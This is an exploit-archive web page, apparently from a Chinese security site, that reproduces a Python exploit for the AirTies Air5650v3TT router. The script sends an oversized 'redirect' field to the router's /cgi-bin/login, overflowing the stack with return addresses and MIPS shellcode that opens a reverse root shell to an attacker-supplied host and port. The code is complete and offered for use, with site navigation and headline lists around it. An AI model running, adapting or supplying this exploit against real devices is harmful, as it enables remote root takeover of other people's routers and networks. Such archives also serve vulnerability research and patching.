首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Airties Air5650v3TT Remote Stack Overflow
来源:http://www.bmicrosystems.com 作者:Burakcin 发布时间:2015-04-07   
#!/usr/bin/env python
#####################################################################################
# Exploit for the AIRTIES Air5650v3TT
# Spawns a reverse root shell
# Author: Batuhan Burakcin
# Contact: batuhan@bmicrosystems.com
# Twitter: @batuhanburakcin
# Web: http://www.bmicrosystems.com
#####################################################################################
 
import sys
import time
import string
import socket, struct
import urllib, urllib2, httplib
 
 
 
 
 
if __name__ == '__main__':
     
 
 
 
    try:
        ip = sys.argv[1]
        revhost = sys.argv[2]
        revport = sys.argv[3]
    except:
        print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0]
 
    host = struct.unpack('>L',socket.inet_aton(revhost))[0] 
    port = string.atoi(revport)
 
 
    shellcode = ""
    shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd"
    shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff"
    shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0"
    shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
    shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
    shellcode += "\xaf\xae\xff\xe4"
    shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1]
    shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3]
    shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27"
    shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27"
    shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c"
    shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff"
    shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f"
    shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec"
    shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab"
    shellcode += "\x01\x01\x01\x0c"
 
 
    data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40"
    data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C"
    data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48
 
    pdata = {
        'redirect'      : data,
        'self'          : '1',
        'user'          : 'tanri',
        'password'      : 'ihtiyacmyok',
        'gonder'        : 'TAMAM'
        }
 
    login_data = urllib.urlencode(pdata)
    #print login_data
 
    url = 'http://%s/cgi-bin/login' % ip
    header = {}
    req = urllib2.Request(url, login_data, header)
    rsp = urllib2.urlopen(req)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Solarwinds Firewall Security M
·Samba CVE-2015-0240 远程代码执
·JBoss Seam 2 File Upload and E
·Mac OS X rootpipe Local Privil
·w3tw0rk / Pitbull Perl IRC Bot
·Barracuda Firmware <= 5.0.0.01
·Webgate WESP SDK 1.2 ChangePas
·Elipse SCADA 2.29 b141 - DLL H
·WebGate eDVR Manager 2.6.4 Aud
·Mac OS X Rootpipe Privilege Es
·WebGate WinRDS 2.0.8 PlaySiteA
·Adobe Flash Player casi32 Inte
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved